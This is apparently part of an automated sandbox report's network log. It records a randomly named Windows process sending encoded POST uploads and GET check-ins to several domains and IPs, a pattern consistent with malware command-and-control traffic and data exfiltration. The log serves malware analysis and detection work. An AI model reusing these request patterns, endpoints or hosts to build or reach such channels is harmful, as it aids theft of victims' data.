                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.hourglasspoise.net
                                              Referer: http://www.hourglasspoise.net/5gvb/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=ye0dAO7TakWo0pS2hjW2bfQq32PItAtNMuKNiRo8ubaaXr7fYTCJ1NbslUozS0gnF8gGwN3CxZP+GUiZ2xDq28vuBGTMJBHmW6MlgW69pjDsFPALGPIx24G2xIwBkqLuaZ1lVmSsi5XCSZE3QZIss30reYO+Pi4/Y0sQgpGaR7r4RKRpJuLTTCnOoAdpJkhz/8RjVXDIaJ/FfJ/PCZatcwP/pWiHJG2eNQr8JNMM5/jPfaIvSQ/YxcgozqQLNHGfS62TfJz3OrSDW11ayQzheDuRXZ8j6Y0xhbClvO8j3WNAOU37NeYKVM+ZpG2wh46MK7foZr8tJpY5Vo8jt32Zt9iXdQyrGv+lHJ1nvYX88zs2Ib7ZDB9oDa78N5eEHxOR31yGPFiTnhqoCktltddmKpPSXJRDU2tnmuyti/na+rCsuxqex2gtO8uDefRVhvhboPGdiJOOn3oeX3D8T+Q849MMk30FqCx06c126ZPnOjFEsWdx3+2vdiwdhH96LwmhV7l0kYpTv7fcl+ICOU1e7VFUG8lxLpETlD4JjhanU1wQ85ahEHs0hJ5/CJ9BKyU8iaLceYU4XmwjsdlLWVvR4/A0aTDLygrLj+Ziim2iNzCacMdH1WoUGqmLLexdZ+hcHiB+XYMxKeVd4Q0VgM6Kd7hbq/zTNJiZJTuDtBDqQWJrvvByV/MTj6BZCV+YfbaR4OBJxQ2+cXVV6oQyPyIy1qVlfIEb/OD4hIuXqSlGUnbSylJWzc+Icp5yGacTaaWKKNH9w72vsc4qpwcvNqFOpexs1XxrhU3h5YM58fY9zd9xnnjAGeGmEPBMof8rP9dpAoblVEzn9HEcqSx2e2SRdKRF+vkF8cJm0kLEt2kF0VSyExNN4mMLYMMpmgd6AzCAYqA6rx8QyOgABj9VmcEXs83dfzg1KFLWVzrSRwmDFvn7gmxJingz7Oao2Xu4xWVedlhvggv5tfdigTr0FW+zgFo/aFeTaUZ6Mj/mPUDSgQtjVSo5 [TRUNCATED]
                                              Jul 26, 2024 13:57:26.247764111 CEST | 1236 | OUT |
                                              Data Ascii: OtsvUaFpUFDvFRd4ZfR8ZLRtlFHSsCQd6NHyrbZzz2fFWClE2CggYkwRmHhzntXgyHvPH472yDex53F0GVM8UN0yAT60sSVxL2iPIp/WZaORThC7k1w3NBPk1CmOHl4Lw9g0U9jwnlNKA0oR1BR2YlIquuQNP7N+zOO5XNOQccXWRA9kgyBTHqLIec5inxKkFYLeC/Yry5+I+k5gTjRMWr6WP9FiFQCAfOptpi7EON5ulHj15ry


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.4 | 49751 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:28.775079966 CEST | 435 | OUT | GET /5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik= HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:29.248251915 CEST | 399 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Fri, 26 Jul 2024 11:57:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 259
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik="}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.4 | 49752 | 217.160.164.240 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:34.403213978 CEST | 685 | OUT | POST /34b9/ HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.asymtos.tech
                                              Referer: http://www.asymtos.tech/34b9/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=b45CRQRXxPQpZwcFh8uyLR74VrLSubIsepG/8vu8Sbia9u3oyKDqktOSKfhjcNbpYqMLtUehWvo9y9GNAh7wtq/NULi0HVxxcGrvuMNQi3WaetyfwrCKbQ+lHVgttfL4noxZsuM+LaKmLpAAMcGKImgOAcnWrZUZe7JE+RT/SLWSkxSFJK1s+CYoUlC7ZnZMXQ==
                                              Jul 26, 2024 13:57:35.005362988 CEST | 349 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.4 | 49753 | 217.160.164.240 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:36.987916946 CEST | 705 | OUT | POST /34b9/ HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.asymtos.tech
                                              Referer: http://www.asymtos.tech/34b9/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=b45CRQRXxPQpYQsFnb6yax77JbLSn7Iwepa/8ur3Ru6a6PHoxO3qqNOSePhcB9buYqQDtR+hWvs9y/uNAQ7/t6/PYriMaFxxcGrvuPx2i3eae+qf2O/cEg+kXlgtn/L8nox3ssoYLcGmLpQANNGJGWgIEcmO4cl9cLFP4g/EPPO5oXDfY7U7sC8bJiLPUkkFMYr88o2BoRlYOzHqDFcR/b4=
                                              Jul 26, 2024 13:57:37.598294973 CEST | 349 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.4 | 49754 | 217.160.164.240 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:39.562014103 CEST | 10787 | OUT | POST /34b9/ HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.asymtos.tech
                                              Referer: http://www.asymtos.tech/34b9/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:40.169842958 CEST | 349 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.4 | 49755 | 217.160.164.240 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:42.160996914 CEST | 429 | OUT | GET /34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:42.775219917 CEST | 494 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.4 | 49756 | 203.161.42.162 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:47.969371080 CEST | 679 | OUT | POST /ukrf/ HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.lontos.top
                                              Referer: http://www.lontos.top/ukrf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=I9FJUB+LGXAkQNBk2bNugGroKt4S8ja8u0csIHTMlRAA3DJBjRbwmCcGJmsjIhfNbpthTfEfioGqamJql4nyLt1JwcclJ2RILT7hpt3GMd7iaJ8WGp09A3kexYbDzSCqP6fMRPUIBQBYXOirr2ffO410OiltUVLXP9Dw8R3NnSM1aRGZ+tByaaef4T7zM4JZEg==
                                              Jul 26, 2024 13:57:48.598254919 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:48 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.4 | 49757 | 203.161.42.162 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:50.546781063 CEST | 699 | OUT | POST /ukrf/ HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.lontos.top
                                              Referer: http://www.lontos.top/ukrf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=I9FJUB+LGXAkRoJk08ZuxWrrPt4Syza4u0QsIF+XmikA2mtBiQbwzCcGHGsmVRfGbpRpTaEfiuqqaiNqlP7zL91LpMcdUGRILT7hptT4MZXia60WALM+KXkfhIbDliCuP6ejROJtBVNYXP+roj/eE41IDCkDanndD+OY0zrXmCAefXXDvcglIa6slUyHB70Qfi2FNfcOTxrlE01tU9I5ymo=
                                              Jul 26, 2024 13:57:51.119266987 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:51 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.4 | 49758 | 203.161.42.162 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:53.114577055 CEST | 10781 | OUT | POST /ukrf/ HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.lontos.top
                                              Referer: http://www.lontos.top/ukrf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:53.744334936 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:53 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.4 | 49759 | 203.161.42.162 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:55.678356886 CEST | 427 | OUT | GET /ukrf/?bPD=F/tpX3aJNzQcZIorwLh3+lvUFPUZ/CrYoWsqF027uxYn9zYWtTXD7TxpBDgZUhfyO+VwBO4Do9/nXXxf/u2OALcIo7otd0ARGQzWw/PbAY7nMJoOO6tnPWI=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:56.269808054 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:56 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:01.520011902 CEST | 703 | OUT | POST /6fdz/ HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.theiconsummit.life
                                              Referer: http://www.theiconsummit.life/6fdz/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=Dg2VGhLG3e+hutHc5UJ+ZPncde4pdkha7VqkybhmEnO7x9ZLt87AKhyg3ce0tWL9FNEA+yzoxfyo8NZDSmHGfROee8jzhCTAPnZhJ3Z3LICBrh+Mm13dJq+0gr5+q8InwwpOKimLxByIOoNNWkLpNzxogfWTlKG9tHHmox0/mRfFVPvEKlt2mSIk3TH9VWSc5w==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:04.096533060 CEST | 723 | OUT | POST /6fdz/ HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.theiconsummit.life
                                              Referer: http://www.theiconsummit.life/6fdz/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=Dg2VGhLG3e+h/83cqj1+evnbR+4pUEhe7VmkyYsjE1q7yYlL/N7ANhygvMexg2L2FNB/+23oxbao8JdDRUvBZBOQHsj9lCTAPnZhJ3NJLIKBrxOMnU3eKq+3wL5+gcIjwwoZKj6hxDKIOtxNX2juWjwjv/XamaHFsy69jXoMtwTpdp+ebUMh0SsXqUOJYVvVix2HWBWEwG9WDz+qm65SXfs=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:06.666810036 CEST | 10805 | OUT | POST /6fdz/ HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.theiconsummit.life
                                              Referer: http://www.theiconsummit.life/6fdz/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.4 | 49763 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:09.235198975 CEST | 435 | OUT | GET /6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:58:09.696382999 CEST | 399 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Fri, 26 Jul 2024 11:58:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 259
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.4 | 49764 | 103.29.180.74 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:15.145391941 CEST | 712 | OUT | POST /5pdf/ HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.accessoriestechbd.com
                                              Referer: http://www.accessoriestechbd.com/5pdf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:58:16.188232899 CEST | 926 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 708
                                              date: Fri, 26 Jul 2024 11:58:15 GMT
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.4 | 49765 | 103.29.180.74 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:17.713274002 CEST | 732 | OUT | POST /5pdf/ HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.accessoriestechbd.com
                                              Referer: http://www.accessoriestechbd.com/5pdf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.4 | 49766 | 103.29.180.74 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:20.286775112 CEST | 10814 | OUT | POST /5pdf/ HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.accessoriestechbd.com
                                              Referer: http://www.accessoriestechbd.com/5pdf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              24 | 192.168.2.4 | 49767 | 103.29.180.74 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:58:23.270807028 CEST | 438 | OUT | GET /5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0= HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:58:27.994468927 CEST | 926 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 708
                                              date: Fri, 26 Jul 2024 11:58:27 GMT
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Target ID:0
                                              Start time:07:55:16
                                              Start date:26/07/2024
